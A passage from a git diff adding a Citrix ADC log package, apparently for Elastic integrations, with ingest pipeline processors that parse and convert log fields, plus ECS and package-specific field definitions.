'%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - date: + field: citrix_adc.log.timestamp + tag: date_timestamp + target_field: citrix_adc.log.timestamp + formats: + - UNIX_MS + - ISO8601 + - MM/dd/yyyy:HH:mm:ss + - MMM d HH:mm:ss + - MMM d HH:mm:ss + - MMM dd HH:mm:ss + - MMMM d HH:mm:ss + - MMMM d HH:mm:ss + - MMMM dd HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM dd HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM dd HH:mm:ss + if: ctx.citrix_adc?.log?.timestamp != null && ctx.citrix_adc.log.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_bytes_received + tag: convert_total_bytes_received_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.bytes + tag: set_destination_bytes_from_total_bytes_received + copy_from: citrix_adc.log.total_bytes_received + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.original_destination.ip + tag: convert_original_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.original_destination?.ip != null && ctx.citrix_adc.log.original_destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.translated_destination.ip + tag: convert_translated_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.translated_destination?.ip != null && ctx.citrix_adc.log.translated_destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_translated_destination_ip + copy_from: citrix_adc.log.translated_destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.port + tag: convert_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.original_destination.port + tag: convert_original_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.translated_destination.port + tag: convert_translated_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_destination_port + copy_from: citrix_adc.log.destination.port + ignore_empty_value: true + - set: + field: destination.port + tag: set_destination_port_from_translated_destination_port + copy_from: citrix_adc.log.translated_destination.port + ignore_empty_value: true + - set: + field: event.action + tag: set_event_action_from_action + copy_from: citrix_adc.log.action + ignore_empty_value: true + - date: + field: citrix_adc.log.delink_time + tag: date_delink_time + target_field: citrix_adc.log.delink_time + formats: + - yyyy/MM/dd:HH:mm:ss + - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss + - ISO8601 + if: ctx.citrix_adc?.log?.delink_time != null && ctx.citrix_adc.log.delink_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.end + tag: set_event_end_from_delink_time + copy_from: citrix_adc.log.delink_time + ignore_empty_value: true + - date: + field: citrix_adc.log.end_time + tag: date_end_time + target_field: citrix_adc.log.end_time + formats: + - ISO8601 + - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss + if: ctx.citrix_adc?.log?.end_time != null && ctx.citrix_adc.log.end_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.end + tag: set_event_end_from_end_time + copy_from: citrix_adc.log.end_time + ignore_empty_value: true + - set: + field: event.reason + tag: set_event_reason_from_closure_reason + copy_from: citrix_adc.log.closure_reason + ignore_empty_value: true + - date: + field: citrix_adc.log.start_time + tag: date_start_time + target_field: citrix_adc.log.start_time + formats: + - ISO8601 + - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss + if: ctx.citrix_adc?.log?.start_time != null && ctx.citrix_adc.log.start_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.start + tag: set_event_start_from_start_time + copy_from: citrix_adc.log.start_time + ignore_empty_value: true + - set: + field: network.protocol + tag: set_network_protocol_from_protocol + copy_from: citrix_adc.log.protocol + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.ip + tag: convert_vserver_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.vserver?.ip != null && ctx.citrix_adc.log.vserver.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.ip + tag: set_server_ip_from_vserver_ip + copy_from: citrix_adc.log.vserver.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.port + tag: convert_vserver_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.port + tag: set_server_port_from_vserver_port + copy_from: citrix_adc.log.vserver.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.total_bytes_send + tag: convert_total_bytes_send_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.bytes + tag: set_source_bytes_from_total_bytes_send + copy_from: citrix_adc.log.total_bytes_send + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.nat.ip + tag: convert_nat_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.nat?.ip != null && ctx.citrix_adc.log.nat.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.nat.ip + tag: set_source_nat_ip_from_nat_ip + copy_from: citrix_adc.log.nat.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.nat.port + tag: convert_nat_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.nat.port + tag: set_source_nat_port_from_nat_port + copy_from: citrix_adc.log.nat.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.port + tag: convert_source_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_source_port + copy_from: citrix_adc.log.source.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.type + tag: convert_type_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.code + tag: convert_code_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.code + tag: set_event_code_from_code + copy_from: citrix_adc.log.code + ignore_empty_value: true + - convert: + field: citrix_adc.log.hit.count + tag: convert_hit_count_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/transform_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/transform_feature.yml new file mode 100644 index 00000000000..141c6714c90 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/transform_feature.yml @@ -0,0 +1,49 @@ +--- +description: Pipeline for Citrix Native messages of TRANSFORM feature. +processors: + - grok: + description: Extract fields from message of TRANSFORM feature. + tag: grok_transform_feature + field: citrix.extended.message + patterns: + - '^Client %{IP:citrix_adc.log.client_ip} - Profile %{DATA:citrix_adc.log.profile} - Action %{DATA:citrix_adc.log.action} - Value %{GREEDYDATA:citrix_adc.log.value}$' + - '^Client %{IP:citrix_adc.log.client_ip} - Profile %{DATA:citrix_adc.log.profile} - Action %{DATA:citrix_adc.log.action} - PCRE%{SPACE}error%{SPACE}code %{INT:citrix_adc.log.pcre_error_code}$' + - '^Client %{IP:citrix_adc.log.client_ip} - Profile %{DATA:citrix_adc.log.profile} - Failed%{SPACE}to%{SPACE}write%{SPACE}%{DATA:citrix_adc.log.header}%{SPACE}request%{SPACE}header$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.client_ip + tag: convert_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc?.log.client_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: client.ip + tag: set_client_ip_from_client_ip + copy_from: citrix_adc.log.client_ip + ignore_empty_value: true + - set: + field: event.action + tag: set_event_action_from_action + copy_from: citrix_adc.log.action + ignore_empty_value: true + - convert: + field: citrix_adc.log.pcre_error_code + tag: convert_pcre_error_code_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/fields/agent.yml b/packages/citrix_adc/data_stream/log/fields/agent.yml similarity index 66% rename from packages/trendmicro/data_stream/deep_security/fields/agent.yml rename to packages/citrix_adc/data_stream/log/fields/agent.yml index df8246bfab2..d38a70bd6b3 100644 --- a/packages/trendmicro/data_stream/deep_security/fields/agent.yml +++ b/packages/citrix_adc/data_stream/log/fields/agent.yml @@ -2,14 +2,16 @@ title: Cloud group: 2 description: Fields related to the cloud or infrastructure the events are coming from. - footnote: "Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on." + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' type: group fields: - name: account.id level: extended type: keyword ignore_above: 1024 - description: "The cloud account or organization id used to identify different entities in a multi-tenant environment.\nExamples: AWS account id, Google Cloud ORG Id, or other unique identifier." + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' example: 666777888999 - name: availability_zone level: extended @@ -55,7 +57,9 @@ - name: container title: Container group: 2 - description: "Container fields are used for meta information about the specific container that is the source of information.\nThese fields help correlate data based containers from any runtime." + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' type: group fields: - name: id @@ -81,7 +85,9 @@ - name: host title: Host group: 2 - description: "A host is defined as a general computing instance.\nECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes." + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' type: group fields: - name: architecture @@ -94,19 +100,27 @@ level: extended type: keyword ignore_above: 1024 - description: "Name of the domain of which the host is a member.\nFor example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider." + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' example: CONTOSO default_field: false - name: hostname level: core type: keyword ignore_above: 1024 - description: "Hostname of the host.\nIt normally contains what the `hostname` command returns on the host machine." + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' - name: id level: core type: keyword ignore_above: 1024 - description: "Unique host id.\nAs hostname is not always unique, use values that are meaningful in your environment.\nExample: The current usage of `beat.name`." + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' - name: ip level: core type: ip @@ -120,7 +134,9 @@ level: core type: keyword ignore_above: 1024 - description: "Name of the host.\nIt can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use." + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' - name: os.family level: extended type: keyword @@ -160,7 +176,9 @@ level: core type: keyword ignore_above: 1024 - description: "Type of host.\nFor Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment." + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' - name: containerized type: boolean description: > @@ -178,33 +196,12 @@ description: > OS codename, if any. -- name: log.source.address - type: keyword - description: Source address from which the log event was read / sent from. - name: input.type type: keyword - description: Input type + description: Input type. - name: log.offset type: long - description: Log offset -- name: log.file - type: group - fields: - - name: device_id - type: keyword - description: ID of the device containing the filesystem where the file resides. - - name: fingerprint - type: keyword - description: The sha256 fingerprint identity of the file when fingerprinting is enabled. - - name: inode - type: keyword - description: Inode number of the log file. - - name: idxhi - type: keyword - description: The high-order part of a unique identifier that is associated with a file. (Windows-only) - - name: idxlo - type: keyword - description: The low-order part of a unique identifier that is associated with a file. (Windows-only) - - name: vol - type: keyword - description: The serial number of the volume that contains a file. (Windows-only) + description: Offset of the entry in the log file. +- name: log.source.address + type: keyword + description: Source address from which the log event was read / sent from. diff --git a/packages/citrix_adc/data_stream/log/fields/base-fields.yml b/packages/citrix_adc/data_stream/log/fields/base-fields.yml new file mode 100644 index 00000000000..b2f34a08dc6 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/fields/base-fields.yml @@ -0,0 +1,17 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module + value: citrix_adc +- name: event.dataset + type: constant_keyword + description: Event dataset + value: citrix_adc.log diff --git a/packages/trendmicro/data_stream/deep_security/fields/ecs.yml b/packages/citrix_adc/data_stream/log/fields/ecs.yml similarity index 53% rename from packages/trendmicro/data_stream/deep_security/fields/ecs.yml rename to packages/citrix_adc/data_stream/log/fields/ecs.yml index 15c10d63875..4ff1fa2e571 100644 --- a/packages/trendmicro/data_stream/deep_security/fields/ecs.yml +++ b/packages/citrix_adc/data_stream/log/fields/ecs.yml @@ -1,83 +1,90 @@ - external: ecs - name: destination.as.number + name: "@timestamp" - external: ecs - name: destination.as.organization.name + name: client.as.number - external: ecs - name: destination.bytes + name: client.as.organization.name - external: ecs - name: destination.domain + name: client.geo.city_name - external: ecs - name: destination.geo.city_name + name: client.geo.continent_name - external: ecs - name: destination.geo.continent_name + name: client.geo.country_iso_code - external: ecs - name: destination.geo.country_iso_code + name: client.geo.country_name - external: ecs - name: destination.geo.country_name -- description: Longitude and latitude. - level: core - name: destination.geo.location - type: geo_point + name: client.geo.location - external: ecs - name: destination.geo.region_iso_code + name: client.geo.region_iso_code - external: ecs - name: destination.geo.region_name + name: client.geo.region_name - external: ecs - name: destination.ip + name: client.user.name - external: ecs - name: destination.nat.ip -- external: ecs - name: destination.nat.port + name: ecs.version - external: ecs - name: destination.port + name: error.message - external: ecs - name: destination.user.group.id + name: event.category - external: ecs - name: destination.user.group.name + name: event.code - external: ecs - name: destination.user.id + name: event.created - external: ecs - name: destination.user.name + name: event.duration - external: ecs - name: ecs.version + name: event.end - external: ecs name: event.ingested - external: ecs - name: event.original + name: event.kind - external: ecs - name: file.group + name: event.provider - external: ecs - name: file.hash.md5 + name: event.severity - external: ecs - name: file.hash.sha1 + name: event.start - external: ecs - name: file.hash.sha256 + name: event.timezone - external: ecs - name: file.inode -- external: ecs - name: file.type + name: event.type - external: ecs name: file.path - external: ecs - name: file.size + name: labels - external: ecs - name: http.request.method + name: http.request.id - external: ecs - name: http.request.referrer + name: http.request.method - external: ecs name: log.file.path - external: ecs - name: log.syslog.priority + name: log.level - external: ecs name: message - external: ecs - name: network.application + name: network.bytes - external: ecs name: network.community_id - external: ecs name: network.direction +- external: ecs + name: network.iana_number +- external: ecs + name: network.inner + type: group +- external: ecs + name: network.inner.vlan.id +- external: ecs + name: network.inner.vlan.name +- external: ecs + name: network.protocol - external: ecs name: network.transport +- external: ecs + name: network.type +- external: ecs + name: observer.egress.interface.name - external: ecs name: observer.egress.zone - external: ecs @@ -88,6 +95,8 @@ name: observer.ingress.zone - external: ecs name: observer.ip +- external: ecs + name: observer.name - external: ecs name: observer.product - external: ecs @@ -97,7 +106,9 @@ - external: ecs name: observer.version - external: ecs - name: related.hash + name: process.name +- external: ecs + name: process.pid - external: ecs name: related.hosts - external: ecs @@ -105,11 +116,7 @@ - external: ecs name: related.user - external: ecs - name: rule.category -- external: ecs - name: rule.id -- external: ecs - name: rule.uuid + name: source.address - external: ecs name: source.as.number - external: ecs @@ -126,10 +133,8 @@ name: source.geo.country_iso_code - external: ecs name: source.geo.country_name -- description: Longitude and latitude. - level: core +- external: ecs name: source.geo.location - type: geo_point - external: ecs name: source.geo.region_iso_code - external: ecs @@ -143,34 +148,60 @@ - external: ecs name: source.port - external: ecs - name: source.user.group.id + name: source.user.domain +- external: ecs + name: source.user.name - external: ecs name: source.user.group.name - external: ecs - name: source.user.id + name: tags - external: ecs - name: source.user.name + name: url.domain - external: ecs - name: tags + name: url.extension +- external: ecs + name: url.fragment +- external: ecs + name: url.full - external: ecs name: url.original - external: ecs - name: user_agent.original -- name: event.action - external: ecs -- name: event.category - external: ecs -- name: event.type - external: ecs -- name: event.code - external: ecs -- name: event.duration - external: ecs -- name: event.id - external: ecs -- name: event.kind - external: ecs -- name: event.risk_score - external: ecs -- name: event.severity - external: ecs + name: url.password +- external: ecs + name: url.path +- external: ecs + name: url.port +- external: ecs + name: url.query +- external: ecs + name: url.registered_domain +- external: ecs + name: url.scheme +- external: ecs + name: url.subdomain +- external: ecs + name: url.top_level_domain +- external: ecs + name: url.username +- external: ecs + name: user.email +- external: ecs + name: user.name +- external: ecs + name: server.domain +- external: ecs + name: server.address +- external: ecs + name: server.port +- external: ecs + name: server.ip +- external: ecs + name: server.user.name +- external: ecs + name: client.domain +- external: ecs + name: client.address +- external: ecs + name: client.port +- external: ecs + name: client.ip diff --git a/packages/citrix_adc/data_stream/log/fields/fields.yml b/packages/citrix_adc/data_stream/log/fields/fields.yml new file mode 100644 index 00000000000..24118d6901e --- /dev/null +++ b/packages/citrix_adc/data_stream/log/fields/fields.yml @@ -0,0 +1,606 @@ +- name: citrix + type: group + fields: + - name: cef_format + description: Whether the logging is in Citrix CEF format. + type: boolean + - name: cef_version + description: The CEF format version used in the logs. + type: keyword + - name: device_event_class_id + description: The ID of the event class. + type: keyword + - name: default_class + description: Whether the event class was the default. + type: boolean + - name: detail + description: The CEF or Citrix Native format details for the event. + type: keyword + - name: device_product + description: The model of the appliance. + type: keyword + - name: device_vendor + description: The name of the vendor for the device. + type: keyword + - name: device_version + description: The version of the device. + type: keyword + - name: facility + description: The logging facility. + type: keyword + - name: host + description: The name of the host receiving the logs. + type: keyword + - name: hostname + description: The name of the host receiving the logs. + type: keyword + - name: name + description: The name of the security check. + type: keyword + - name: ppe_id + description: Packet Processing Engine ID. + type: keyword + - name: priority + description: The logging priority. + type: keyword + - name: profile_name + description: The name of the profile that raised the event. + type: keyword + - name: session_id + description: The ID for the session. + type: keyword + - name: severity + description: The severity of the event. + type: keyword + - name: signature_violation_category + description: The category that the violation is grouped into. + type: keyword + - name: extended + description: Additional data associated with the event. + type: flattened +- name: citrix_adc + type: group + fields: + - name: log + type: group + fields: + - name: access + type: keyword + - name: access_type + type: keyword + - name: action + type: keyword + - name: adm_user + type: keyword + - name: app + type: group + fields: + - name: launch_time + type: keyword + - name: name + type: keyword + - name: process_id + type: long + - name: termination_time + type: keyword + - name: termination_type + type: keyword + - name: appfw_rfc_profile + type: keyword + - name: application_name + type: keyword + - name: auto_deploy_mins + type: long + - name: browser + type: keyword + - name: browser_type + type: keyword + - name: bytes + type: group + fields: + - name: received + type: long + - name: sent + type: long + - name: call_id + type: keyword + - name: callee + type: group + fields: + - name: domain_name + type: keyword + - name: user_name + type: keyword + - name: caller + type: group + fields: + - name: domain_name + type: keyword + - name: user_name + type: keyword + - name: category + type: keyword + - name: category_group + type: keyword + - name: certificate_key_pair + type: keyword + - name: channel_id_1 + type: long + - name: channel_id_1_val + type: long + - name: channel_id_2 + type: long + - name: channel_id_2_val + type: long + - name: channel_id_3 + type: long + - name: channel_id_3_val + type: long + - name: channel_id_4 + type: long + - name: channel_id_4_val + type: long + - name: channel_id_5 + type: long + - name: channel_id_5_val + type: long + - name: channel_update + type: group + fields: + - name: begin + type: keyword + - name: end + type: keyword + - name: cipher_suite + type: keyword + - name: client_cookie + type: keyword + - name: client_hostname + type: keyword + - name: client_ip + type: ip + - name: client_launcher + type: keyword + - name: client_port + type: long + - name: client_security_check_status + type: keyword + - name: client_security_expression + type: keyword + - name: client_type + type: keyword + - name: client_version + type: keyword + - name: clientside + type: group + fields: + - name: jitter + type: long + - name: packet_retransmits + type: long + - name: rtt + type: keyword + - name: rxbytes + type: long + - name: txbytes + type: long + - name: closure_reason + type: keyword + - name: code + type: keyword + - name: command + type: keyword + - name: compression_ratio_recieved + type: double + - name: compression_ratio_send + type: double + - name: connection_id + type: keyword + - name: connection_priority + type: keyword + - name: content_length_bytes + type: long + - name: content_type + type: keyword + - name: content_type_mismatch + type: keyword + - name: cookie_header_length + type: long + - name: crl_name + type: keyword + - name: customer_name + type: keyword + - name: data + type: keyword + - name: data_length + type: long + - name: days_to_expire + type: long + - name: deleted_rules + type: long + - name: delink_time + type: date + - name: delink_timezone + type: keyword + - name: destination + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: device_serial_number + type: keyword + - name: domain + type: keyword + - name: domain_name + type: keyword + - name: duration + type: keyword + - name: end_time + type: date + - name: end_time_timezone + type: keyword + - name: errmsg + type: keyword + - name: error + type: keyword + - name: error_code + type: keyword + - name: error_line + type: keyword + - name: failure_reason + type: keyword + - name: field_name + type: keyword + - name: field_type + type: keyword + - name: flags + type: keyword + - name: group + type: keyword + - name: groups + type: keyword + - name: handshake_time + type: keyword + - name: header + type: keyword + - name: header_length + type: long + - name: hit + type: group + fields: + - name: count + type: long + - name: rule + type: keyword + - name: hostname + type: keyword + - name: html_url + type: keyword + - name: http_resources_accessed + type: keyword + - name: ica_rtt + type: keyword + - name: icap_server + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: id + type: keyword + - name: infomsg + type: keyword + - name: ip_address + type: ip + - name: issuer_name + type: keyword + - name: l7_latency + type: group + fields: + - name: max_notify_count + type: long + - name: notify_interval + type: long + - name: threshold_factor + type: long + - name: waittime + type: keyword + - name: l7_threshold_breach + type: group + fields: + - name: avg_clientside_latency + type: long + - name: avg_serverside_latency + type: long + - name: max_clientside_latency + type: long + - name: max_serverside_latency + type: long + - name: last_contact + type: keyword + - name: launch_mechanism + type: keyword + - name: ldap_scope + type: keyword + - name: license_limit + type: long + - name: logout_method + type: keyword + - name: matched_url + type: keyword + - name: max_allowed + type: group + fields: + - name: cookie_header_length + type: long + - name: header_length + type: long + - name: query_string_length + type: long + - name: total_http_header_length + type: long + - name: url_length + type: long + - name: max_restarts + type: long + - name: message + type: keyword + - name: method + type: keyword + - name: min_l7_latency + type: long + - name: mode + type: keyword + - name: module_path + type: keyword + - name: nat + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: natted + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: newly_added_rules + type: long + - name: non_http_services_accessed + type: keyword + - name: nsica_session + type: group + fields: + - name: acr_count + type: long + - name: client + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: reconnect_count + type: long + - name: server + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: status + type: keyword + - name: nsica_status + type: keyword + - name: old_pid + type: long + - name: origin_server + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: original_destination + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: pcre_error_code + type: keyword + - name: peid + type: keyword + - name: policy_action + type: keyword + - name: policy_violation + type: keyword + - name: process + type: group + fields: + - name: id + type: long + - name: name + type: keyword + - name: profile + type: keyword + - name: protocol + type: keyword + - name: protocol_version + type: keyword + - name: query_string_length + type: long + - name: reason + type: keyword + - name: referer_header + type: keyword + - name: register + type: keyword + - name: remote_ip + type: ip + - name: reputation + type: long + - name: request + type: group + fields: + - name: bytes_sent + type: long + - name: path + type: keyword + - name: response + type: group + fields: + - name: bytes_sent + type: long + - name: code + type: long + - name: rewritten_url + type: keyword + - name: rule + type: keyword + - name: rule_id + type: keyword + - name: sequence_number + type: long + - name: serial_number + type: keyword + - name: server + type: group + fields: + - name: ip + type: ip + - name: name + type: keyword + - name: port + type: long + - name: server_authentication + type: keyword + - name: serverside + type: group + fields: + - name: jitter + type: long + - name: packet_retransmits + type: long + - name: rtt + type: keyword + - name: service + type: keyword + - name: session + type: keyword + - name: session_end_time + type: keyword + - name: session_guid + type: keyword + - name: session_id + type: keyword + - name: session_setup_time + type: keyword + - name: signature_algorithm + type: keyword + - name: signature_id + type: keyword + - name: source + type: group + fields: + - name: ip + type: ip + - name: port + type: long + - name: spcb_id + type: keyword + - name: ssl_relay + type: group + fields: + - name: address + type: ip + - name: port + type: 